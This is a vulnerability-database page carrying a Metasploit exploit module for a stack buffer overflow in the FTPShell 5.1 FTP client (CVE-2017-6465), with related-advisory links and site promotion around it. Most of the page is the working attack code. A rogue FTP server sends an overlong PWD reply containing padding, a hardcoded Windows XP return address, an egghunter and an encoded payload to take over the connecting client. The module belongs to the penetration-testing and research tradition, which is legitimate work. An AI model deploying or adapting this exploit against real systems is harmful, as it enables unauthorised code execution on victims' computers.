Lucene search
+L

FTPShell 5.1 Stack Buffer Overflow

🗓️ 12 Oct 2010 00:00:00Reported by corelanc0d3r <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 17 Views

FTPShell 5.1 Stack Buffer Overflow in FTP client processing PWD comman

Related
Code
ReporterTitlePublishedViews
Family
zdt
zdt
FTPShell Client 6.53 - Buffer Overflow Exploit
6 Mar 201700:00
zdt
circl
Circl
CVE-2017-6465
4 Mar 201700:00
circl
checkpoint_advisories
Check Point Advisories
FTPShell Client Buffer Overflow (CVE-2009-3364; CVE-2017-6465; CVE-2018-7573)
31 Jul 201800:00
checkpoint_advisories
cve
CVE
CVE-2017-6465
10 Mar 201701:00
cve
cvelist
Cvelist
CVE-2017-6465
10 Mar 201701:00
cvelist
exploitdb
Exploit DB
FTPShell Client 6.53 - Remote Buffer Overflow
4 Mar 201700:00
exploitdb
exploitpack
exploitpack
FTPShell Client 6.53 - Remote Buffer Overflow
4 Mar 201700:00
exploitpack
nvd
NVD
CVE-2017-6465
10 Mar 201701:59
nvd
osv
OSV
CVE-2017-6465
10 Mar 201701:59
osv
packetstorm
Packet Storm
FTPShell Client 6.53 Buffer Overflow
5 Mar 201700:00
packetstorm
Rows per page
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  include Exploit::Remote::FtpServer
  include Exploit::Remote::Egghunter

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'FTPShell 5.1 Stack Buffer Overflow',
        'Description' => %q{
          This module exploits a stack buffer overflow in FTPShell 5.1. The overflow gets
          triggered when the ftp client tries to process an overly long response to a PWD
          command. This will overwrite the saved EIP and structured exception handler.
        },
        'Author' => [
          'corelanc0d3r <peter.ve[at]corelan.be>'	# found bug, wrote the exploit
        ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'CVE', '2017-6465' ],
          [ 'OSVDB', '68639'],
          [ 'URL', 'http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/' ],
        ],
        'DefaultOptions' => {
          'EXITFUNC' => 'thread',
        },
        'Payload' => {
          'BadChars' => "\x00\xff\x0d\x5c\x2f\x0a",
        },
        'Platform' => 'win',
        'Targets' => [
          [ 'Windows XP Universal', { 'Offset' => 399, 'Ret' => 0x779A5483 } ], # jmp ebp [setupapi.dll]]
        ],
        'Privileged' => false,
        'DisclosureDate' => '2010-10-12',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )
  end

  def setup
    super
  end

  def on_client_unknown_command(c, cmd, arg)
    c.put("200 OK\r\n")
  end

  def on_client_command_pwd(c, arg)
    badchars = ""
    eggoptions =
      {
        :checksum => true,
        :eggtag => "w00t"
      }
    hunter, egg = generate_egghunter(payload.encoded, badchars, eggoptions)

    print_status(" - PWD command -> Sending payload")
    junk = "A" * target['Offset']
    nops = "A" * 10
    tweakhunter = "\x5a\x5a"
    eip = [target.ret].pack('V')
    buffer = junk + eip + nops + tweakhunter + hunter + egg
    pwdoutput = "257  \"/" + buffer + "\" is current directory\r\n"
    c.put(pwdoutput)
    print_status(" - Sent #{pwdoutput.length} bytes, wait for hunter")
    return
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

12 Oct 2010 00:00Current
8.8High risk
Vulners AI Score8.8
CVSS 27.5
CVSS 39.8
EPSS0.50315
17